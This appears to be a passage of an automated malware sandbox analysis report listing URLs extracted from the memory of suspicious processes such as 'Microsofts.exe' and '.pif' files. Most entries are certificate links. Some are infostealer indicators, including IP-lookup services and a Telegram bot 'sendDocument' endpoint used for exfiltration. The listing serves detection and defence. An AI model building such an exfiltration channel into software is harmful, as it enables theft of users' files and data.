Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr	String found in binary or memory: http://checkip.dyndns.org/q
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: powershell.exe, 0000000B.00000002.2417126655.0000000006E8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microb
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Microsofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173229317.0000000021F41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2173659376.000000007EC0A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241928880.0000000021FEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000016.00000002.2466353170.0000000020956000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000002.2601418278.0000000020836000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	String found in binary or memory: http://www.pmail.com0
Source: powershell.exe, 0000000B.00000002.2304962068.0000000004331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: rpkhzpuO.pif, 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe.8.dr	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
